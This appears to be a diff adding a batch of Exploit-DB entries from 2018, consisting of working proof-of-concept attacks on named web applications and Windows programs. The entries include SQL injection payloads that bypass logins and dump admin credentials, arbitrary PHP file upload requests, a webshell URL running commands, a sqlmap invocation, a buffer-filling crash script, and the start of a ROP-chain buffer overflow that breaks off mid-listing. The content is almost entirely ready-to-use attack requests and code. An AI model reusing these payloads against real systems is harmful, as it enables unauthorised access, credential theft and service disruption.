+------WebKitFormBoundaryUOOyIF2f26nDrsM7
+Content-Disposition: form-data; name="email"
+
+------WebKitFormBoundaryUOOyIF2f26nDrsM7
+Content-Disposition: form-data; name="web"
+
+------WebKitFormBoundaryUOOyIF2f26nDrsM7
+Content-Disposition: form-data; name="phone_number"
+
+------WebKitFormBoundaryUOOyIF2f26nDrsM7
+Content-Disposition: form-data; name=""
+
+------WebKitFormBoundaryUOOyIF2f26nDrsM7
+Content-Disposition: form-data; name=""
+
+------WebKitFormBoundaryUOOyIF2f26nDrsM7--
+
+# Access your webshell via the below link
+http://172.16.122.4/webiness_inventory-2.3/runtime/PartnerModel/shell.php?cmd=whoami

exploits/php/webapps/45747.txt

@@ -0,0 +1,86 @@
+# Exploit Title: MyBB Downloads 2.0.3 - SQL Injection
+# Date: 28-10-2018
+# Exploit Author: Lucian Ioan Nitescu
+# Contact: https://twitter.com/LucianNitescu
+# Webiste: https://nitesculucian.github.io
+# Vendor Homepage: https://github.com/vintagedaddyo/MyBB_Plugin-Downloads
+# Software Link: https://github.com/vintagedaddyo/MyBB_Plugin-Downloads
+# Version: 2.0.3
+# Tested on: Ubuntu 18.04
+
+1. Description:  
+
+It is a plugin which adds a page to download files. If enabled, regular members can add new downloads to the page after admin approval.  
+
+2. Proof of Concept: 
+
+Persistent XSS  
+- Go to downloads.php page  
+- Create a New Download  
+- Add the following to the title: a"
+- Now on submit, the user will be prompted to an SQL Injection specific error.
+
+```
+MyBB has experienced an internal SQL error and cannot continue.
+
+SQL Error:
+	1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"a""' at line 1
+Query:
+	SELECT * FROM mybb_downloads WHERE name="a""
+```
+
+- THis can be exploited with: sqlmap -r request_file -p name --threads 5
+
+3. Request File example:
+
+POST /downloads.php?newdownload=1 HTTP/1.1
+Host: localhost:8081
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost:8081/downloads.php?newdownload=1
+Content-Type: multipart/form-data; boundary=---------------------------171894060312075061251712806160
+Content-Length: 1029
+Cookie: mybb[lastvisit]=1540744980; mybb[lastactive]=1540745020; sid=677a58d33fe23e7f2ea3841c79496fcd; loginattempts=1; mybbuser=3_waeMfSMiIRrTpPqW2uy8ZF8AMx8pyRtMCUJ6Gx0yoGRyLBsBow
+Connection: close
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+
+-----------------------------171894060312075061251712806160
+Content-Disposition: form-data; name="my_post_key"
+
+6cb47e578ed16aa5272c55b0cb8745b4
+-----------------------------171894060312075061251712806160
+Content-Disposition: form-data; name="name"
+
+a"
+-----------------------------171894060312075061251712806160
+Content-Disposition: form-data; name="shortdesc"
+
+test
+-----------------------------171894060312075061251712806160
+Content-Disposition: form-data; name="description"
+
+test
+-----------------------------171894060312075061251712806160
+Content-Disposition: form-data; name="image"
+
+
+-----------------------------171894060312075061251712806160
+Content-Disposition: form-data; name="url"
+
+1
+-----------------------------171894060312075061251712806160
+Content-Disposition: form-data; name="numimages"
+
+4
+-----------------------------171894060312075061251712806160
+Content-Disposition: form-data; name="submit"
+
+Publish download
+-----------------------------171894060312075061251712806160--
+
+3. Solution:
+
+There is no public available solution.

exploits/php/webapps/45751.txt

@@ -0,0 +1,92 @@
+# Exploit Title: Expense Management 1.0 - Arbitrary File Upload
+# Dork: N/A
+# Date: 2018-10-30
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://www.webprojectbuilder.com/item/expense-management
+# Software Link: https://kent.dl.sourceforge.net/project/expense-management/php_ci-expense_manager-script-1.zip
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/user/add_edit
+# 
+# http://localhost/[PATH]/assets/images/[FILE]
+# 
+POST /[PATH]/user/add_edit HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1
+Connection: keep-alive
+Content-Type: multipart/form-data; boundary=
+---------------------------187769406514267903921739782647
+Content-Length: 743
+-----------------------------187769406514267903921739782647
+Content-Disposition: form-data; name="profile_pic"; filename="phpinfo.php"
+Content-Type: application/force-download
+<?php
+phpinfo();
+?>
+-----------------------------187769406514267903921739782647
+Content-Disposition: form-data; name="fileOld"
+g_1540845821.php
+-----------------------------187769406514267903921739782647
+Content-Disposition: form-data; name="users_id"
+1
+-----------------------------187769406514267903921739782647
+Content-Disposition: form-data; name="user_type"
+admin
+-----------------------------187769406514267903921739782647
+Content-Disposition: form-data; name="submit1"
+-----------------------------187769406514267903921739782647--
+HTTP/1.1 200 OK
+Date: Mon, 29 Oct 2018 20:50:40 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Set-Cookie: ci_session=453324a77afd51a1fd2618b57d3dfd6c880da056; expires=Mon, 29-Oct-2018 22:50:40 GMT; Max-Age=7200; path=/; HttpOnly
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+refresh: 0;url=http://localhost/[PATH]/user/login
+Content-Length: 0
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+GET /[PATH]/assets/images/phpinfo_1540846240.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1; ci_session=453324a77afd51a1fd2618b57d3dfd6c880da056
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Mon, 29 Oct 2018 20:51:11 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
+
+# POC: 
+# 2)
+# http://localhost/[PATH]/user/add_edit
+# 
+<html>
+<body>
+<form method="post" enctype="multipart/form-data" action="http://localhost/[PATH]/user/add_edit">
+<input id="fileUpload" name="profile_pic" type="file"><br>
+<input name="fileOld" value="" type="hidden">
+<input name="users_id" value="1" type="hidden">
+<input name="user_type" value="admin" type="hidden">
+<button name="submit1" type="submit" ">Ver Ayari</button>  
+</form>
+</body>
+</html>

exploits/php/webapps/45752.txt

@@ -0,0 +1,122 @@
+# Exploit Title: University Application System 1.0 - SQL Injection / Cross-Site Request Forgery (Add Admin) 
+# Dork: N/A
+# Date: 2018-10-30
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://www.sourcecodester.com/users/pamzey
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/Patrick%20Mvuma/unima.zip
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/process.php
+# 
+#[PATH]/process.php
+#....
+#1001 if(isset($_POST['addmember']))
+#1002      {
+#1003      	 if($_POST['memail']!=''&&$_POST['mfname']!=''&&$_POST['msname']!=''&&$_POST['mpassword']!=''&&$_POST['mpasswords']!='')
+#1004            {              
+#1005             
+#1006    		$mfname = mysqli_real_escape_string($db,$_POST['mfname']);
+#1007 		$msname = mysqli_real_escape_string($db,$_POST['msname']);		
+#1008 	  $memail=mysqli_real_escape_string($db,$_POST['memail']);
+#1009 	    $mphone =mysqli_real_escape_string($db,$_POST['mphone']);
+#1010 	     $rpassword = mysqli_real_escape_string($db,$_POST['mpasswords']);
+#1011 		   $mpassword = mysqli_real_escape_string($db,$_POST['mpassword']);
+#....
+POST /[PATH]/process.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: pin=%27or+1%3D1+or+%27%27%3D%27; serial=%27or+1%3D1+or+%27%27%3D%27; PHPSESSID=upb6pa4qn0h16clnht4ugvhee1
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 87
+mfname=efe&msname=efe&memail=efe@omerefe.com&mpassword=efe&mpasswords=efe&addmember=ghj
+HTTP/1.1 302 Found
+Date: Mon, 29 Oct 2018 18:44:36 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Location: addadmin.php
+Content-Length: 127
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+# POC: 
+# 2)
+# http://localhost/[PATH]/process.php
+# 
+#[PATH]/process.php
+#....
+#973 if(isset($_POST['schoolgrade'])){
+#974 	  	
+#975 		//$adname=$_POST['']; 
+#976 		 $adname =$_POST["schoolgrade"]; 
+#....
+POST /[PATH]/process.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: pin=%27or+1%3D1+or+%27%27%3D%27; serial=%27or+1%3D1+or+%27%27%3D%27; PHPSESSID=upb6pa4qn0h16clnht4ugvhee1
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 236
+schoolgrade='||(SeleCT 'Efe' FroM duAL WheRE 110=110 AnD (seLEcT 112 frOM(SElecT CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct (ELT(112=112,1))),FLooR(RAnd(0)*2))x FROM INFOrmatION_SchEMA.PluGINS grOUp BY x)a))||'
+HTTP/1.1 200 OK
+Date: Mon, 29 Oct 2018 18:51:22 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 421
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+# POC: 
+# 3)
+# http://localhost/[PATH]/process.php
+# 
+#[PATH]/process.php
+#....
+#516 if(isset($_POST['usernames'])&&$_POST['password'])	{
+#517 			 	
+#518 $usernames=$_POST['usernames'];
+#519 $password=$_POST['password'];
+#....
+POST /[PATH]/process.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 51
+usernames='or 1=1 or ''='&password='or 1=1 or ''='
+HTTP/1.1 200 OK
+Date: Mon, 29 Oct 2018 18:04:45 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Set-Cookie: pin=%27or+1%3D1+or+%27%27%3D%27; expires=Mon, 05-Nov-2018 18:04:45 GMT; Max-Age=604800
+Set-Cookie: serial=%27or+1%3D1+or+%27%27%3D%27; expires=Mon, 05-Nov-2018 18:04:45 GMT; Max-Age=604800
+Content-Length: 247
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8

exploits/php/webapps/45753.txt

@@ -0,0 +1,91 @@
+# Exploit Title: Notes Manager 1.0 - Arbitrary File Upload
+# Dork: N/A
+# Date: 2018-10-30
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://www.webprojectbuilder.com/item/notes-management
+# Software Link: https://astuteinternet.dl.sourceforge.net/project/notes-manager/notes_management.zip
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/user/add_edit
+# 
+# http://localhost/[PATH]/assets/images/[FILE]
+# 
+POST /[PATH]/user/add_edit HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1; ci_session=453324a77afd51a1fd2618b57d3dfd6c880da056
+Connection: keep-alive
+Content-Type: multipart/form-data; boundary=---------------------------95839047417419306891039500038
+Content-Length: 737
+-----------------------------95839047417419306891039500038
+Content-Disposition: form-data; name="profile_pic"; filename="phpinfo.php"
+Content-Type: application/force-download
+<?php
+phpinfo();
+?>
+-----------------------------95839047417419306891039500038
+Content-Disposition: form-data; name="fileOld"
+g_1540845821.php
+-----------------------------95839047417419306891039500038
+Content-Disposition: form-data; name="users_id"
+1
+-----------------------------95839047417419306891039500038
+Content-Disposition: form-data; name="user_type"
+admin
+-----------------------------95839047417419306891039500038
+Content-Disposition: form-data; name="submit1"
+-----------------------------95839047417419306891039500038--
+HTTP/1.1 200 OK
+Date: Mon, 29 Oct 2018 21:10:19 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Set-Cookie: ci_session=00cf0a180900e0b110b84343140d8f1c77a68493; expires=Mon, 29-Oct-2018 23:10:19 GMT; Max-Age=7200; path=/; HttpOnly
+refresh: 0;url=http://localhost/[PATH]/user/login
+Content-Length: 0
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+GET /[PATH]/assets/images/phpinfo_1540847419.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1; ci_session=00cf0a180900e0b110b84343140d8f1c77a68493
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Mon, 29 Oct 2018 21:10:42 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
+
+# POC: 
+# 2)
+# http://localhost/[PATH]/user/add_edit
+# 
+<html>
+<body>
+<form method="post" enctype="multipart/form-data" action="http://localhost/[PATH]/user/add_edit">
+<input id="fileUpload" name="profile_pic" type="file"><br>
+<input name="fileOld" value="" type="hidden">
+<input name="users_id" value="1" type="hidden">
+<input name="user_type" value="admin" type="hidden">
+<button name="submit1" type="submit" ">Ver Ayari</button>  
+</form>
+</body>
+</html>

exploits/php/webapps/45754.txt

@@ -0,0 +1,61 @@
+# Exploit Title: Instagram Clone 1.0 -  Arbitrary File Upload
+# Dork: N/A
+# Date: 2018-10-30
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://www.sourcecodester.com/users/justinwilliam
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/justinwilliam/instagram_3.zip
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/add_profile.php
+# 
+# http://localhost/[PATH]/uploads/[FILE]
+# 
+POST /[PATH]/add_profile.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1
+Connection: keep-alive
+Content-Type: multipart/form-data; boundary=
+---------------------------18601636361709893820977649577
+Content-Length: 369
+-----------------------------18601636361709893820977649577
+Content-Disposition: form-data; name="photo"; filename="phpinfo.php"
+Content-Type: application/force-download
+<?php
+phpinfo();
+?>
+-----------------------------18601636361709893820977649577
+Content-Disposition: form-data; name="submit"
+-----------------------------18601636361709893820977649577--
+HTTP/1.1 200 OK
+Date: Mon, 29 Oct 2018 19:24:03 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 1101
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+# POC: 
+# 2)
+# http://localhost/[PATH]/add_profile.php
+# 
+<html>
+<body>
+<form action="[PATH]/add_profile.php" method="POST" enctype="multipart/form-data">
+<input name="photo" type="file">
+<button type="submit" name="submit" value="Ver Ayari">
+</form>
+</body>
+</html>

exploits/php/webapps/45756.txt

@@ -0,0 +1,139 @@
+# Exploit Title: Simple PHP Shopping Cart 0.9 - Arbitrary File Upload
+# Dork: N/A
+# Date: 2018-10-30
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://asaancart.wordpress.com/
+# Software Link: https://vorboss.dl.sourceforge.net/project/asaancart/asaancart%20v-0.9/asaancart%20v-0.9.zip
+# Version: 0.9
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+POST /[PATH]/admin/login.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 69
+username=%27%6f%72%20%31%3d%31%20%6f%72%20%27%27%3d%27&password=%27%6f%72%20%31%3d%31%20%6f%72%20%27%27%3d%27&btnSubmit=btnSubmit
+HTTP/1.1 302 Found
+Date: Tue, 30 Oct 2018 15:46:43 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Set-Cookie: PHPSESSID=f2a7ov3iih8u10qf9327ana635; path=/
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Location: index.php
+Content-Length: 0
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+POST /[PATH]/admin/add_cat.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=f2a7ov3iih8u10qf9327ana635
+Connection: keep-alive
+Content-Type: multipart/form-data; boundary=
+---------------------------17014069073451786011304294694
+Content-Length: 514
+-----------------------------17014069073451786011304294694
+Content-Disposition: form-data; name="category_name"
+xxx
+-----------------------------17014069073451786011304294694
+Content-Disposition: form-data; name="category_full_image"; filename="phpinfo.php"
+Content-Type: application/force-download
+<?php
+phpinfo();
+?>
+-----------------------------17014069073451786011304294694
+Content-Disposition: form-data; name="btn_submit"
+Create
+-----------------------------17014069073451786011304294694--
+HTTP/1.1 200 OK
+Date: Tue, 30 Oct 2018 15:46:52 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
+
+#/[PATH]/category_images/xxx_phpinfo.php
+
+<form action="http://localhost/[PATH]/admin/add_cat.php" enctype="multipart/form-data" method="post">
+<input name="category_name" value="xxx" type="text" hidden="true">
+<input name="category_full_image" type="file">
+<input name="btn_submit" value="Create" type="submit">
+</form>
+
+
+# Exploit Title: Simple PHP Shopping Cart 0.9 - SQL Injection
+# Dork: N/A
+# Date: 2018-10-30
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://asaancart.wordpress.com/
+# Software Link: https://vorboss.dl.sourceforge.net/project/asaancart/asaancart%20v-0.9/asaancart%20v-0.9.zip
+# Version: 0.9
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/shop/page.php?page_id=[SQL]
+# 
+#[PATH]/page.php
+#....
+#34 $page_heading = $_GET['page_name'];
+#35 $page_id = $_GET['page_id'];
+#....
+GET /[PATH]/shop/page.php?page_id=-1+unIoN++SELect+0x31%2c0x32%2c0x33%2c0x34%2c(SEleCT+GroUP_COncAT(username,0x3a,password+sePaRATOR+0x3c62723e)+FrOM+auth_user_admin)%2d%2d%20%2d HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Tue, 30 Oct 2018 14:01:30 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Set-Cookie: PHPSESSID=u4nfc9bijgcbd8na09o8jp4gb0; path=/
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 6538
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+# POC: 
+# 2)
+# http://localhost/[PATH]/admin/login.php
+# 
+#....
+#32 if ($_POST['btnSubmit']=='btnSubmit')
+#33 {
+#34 	$sql = "SELECT * FROM auth_user_admin WHERE username='".$_POST['username']."' AND password='".md5($_POST['password'])."'";
+#....
+
+# POC: 
+# 3)
+# http://localhost/[PATH]/shop/product.php?product_id=[SQL]
+# 
+#....
+#35 $product_id = $_GET['product_id'];
+#....

exploits/php/webapps/45757.txt

@@ -0,0 +1,92 @@
+# Exploit Title: CI User Login and Management 1.0 - Arbitrary File Upload
+# Dork: N/A
+# Date: 2018-10-30
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage 1: http://www.webprojectbuilder.com/item/user-login-and-management
+# Vendor Homepage 2: https://sourceforge.net/projects/user-management-system/
+# Software Link 1: https://kent.dl.sourceforge.net/project/php-user-login-management/PHP_CI_user_login_and_management-1.zip
+# Software Link 2: https://netix.dl.sourceforge.net/project/user-management-system/PHP_CI_user_login_and_management-1.zip
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/user/add_edit
+# 
+# http://localhost/[PATH]/assets/images/[FILE]
+# 
+POST /[PATH]/user/add_edit HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Content-Type: multipart/form-data; boundary=---------------------------
+212160558019833203481522967977
+Content-Length: 727
+-----------------------------212160558019833203481522967977
+Content-Disposition: form-data; name="profile_pic"; filename="phpinfo.php"
+Content-Type: application/force-download
+<?php
+phpinfo();
+?>
+-----------------------------212160558019833203481522967977
+Content-Disposition: form-data; name="fileOld"
+-----------------------------212160558019833203481522967977
+Content-Disposition: form-data; name="users_id"
+1
+-----------------------------212160558019833203481522967977
+Content-Disposition: form-data; name="user_type"
+admin
+-----------------------------212160558019833203481522967977
+Content-Disposition: form-data; name="submit1"
+-----------------------------212160558019833203481522967977--
+HTTP/1.1 200 OK
+Date: Tue, 30 Oct 2018 06:36:42 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Set-Cookie: ci_session=599e598042864923e909b54019831db9d06c116f; expires=Tue, 30-Oct-2018 08:36:42 GMT; Max-Age=7200; path=/; HttpOnly
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+refresh: 0;url=http://localhost/[PATH]/user/login
+Content-Length: 0
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+GET /[PATH]/assets/images/phpinfo_1540881402.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: ci_session=599e598042864923e909b54019831db9d06c116f
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Tue, 30 Oct 2018 06:37:08 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
+
+# POC: 
+# 2)
+# http://localhost/[PATH]/user/add_edit
+# 
+<html>
+<body>
+<form method="post" enctype="multipart/form-data" action="http://localhost/[PATH]/user/add_edit">
+<input id="fileUpload" name="profile_pic" type="file"><br>
+<input name="fileOld" value="" type="hidden">
+<input name="users_id" value="1" type="hidden">
+<input name="user_type" value="admin" type="hidden">
+<button name="submit1" type="submit" ">Ver Ayari</button>  
+</form>
+</body>
+</html>

exploits/windows/dos/45749.py

@@ -0,0 +1,25 @@
+# Exploit Title: QNAP NetBak Replicator 4.5.6.0607 Denial of Service (PoC)
+# Date: 2018-10-29
+# Exploit Author: Yair Rodríguez Aparicio
+# Vendor Homepage: https://www.qnap.com/en/
+# Software Link: https://www.qnap.com/en/download
+# Version: 4.5.6.0607
+# Tested on: Windows XP Profesional Español SP3 x86 
+
+# Steps to Produce the Crash:
+# 1.- Run python code : python qnap.py
+# 2.- Open text.txt and copy content to clipboard
+# 3.- Open NetBak Replicator.exe
+# 4.- click on Restauración Instantánea
+# 5.- Seleccione Origen -> "Ubicacion de red"
+# 6.- click on "Dirección URL WebDAV"
+# 7.- Paste ClipBoard on "Dirección URL WebDAV"
+# 8.- Click "Aceptar".
+# 9.- Crashed!
+ 
+
+ 
+buffer = "\x41" * 5000
+f = open("text.txt", "w")
+f.write(buffer)
+f.close()

exploits/windows/local/45738.py

@@ -0,0 +1,79 @@
+#!/usr/bin/python
+
+
+###############################################
+#        R 3.4.4 Win10 x86  Buffer Overflow   # 
+#               discovered by: bzyo           #
+#           author: Charles Truscott          #
+#           I love you Alison Thompson OAM    #
+#           tested on: Windows 10 x86         #
+#   rebooted for practice defeating ASLR/DEP  #
+#                                             #
+# --------------------------------------------#
+
+##############################################
+
+# GUI Preferences -> paste boom.txt into 'Language for menus ...' -> click OK
+
+import struct
+
+pad = "A" * 292
+
+rop = struct.pack("L", 0x6cbef3c0)  # POP EAX # RETN [R.dll] 
+rop += struct.pack("L", 0x6e732b48)  # ptr to &VirtualAlloc() [IAT R.dll]
+rop += struct.pack("L", 0x6cba178c)  # MOV EAX,DWORD PTR DS:[EAX] # RETN [R.dll] 
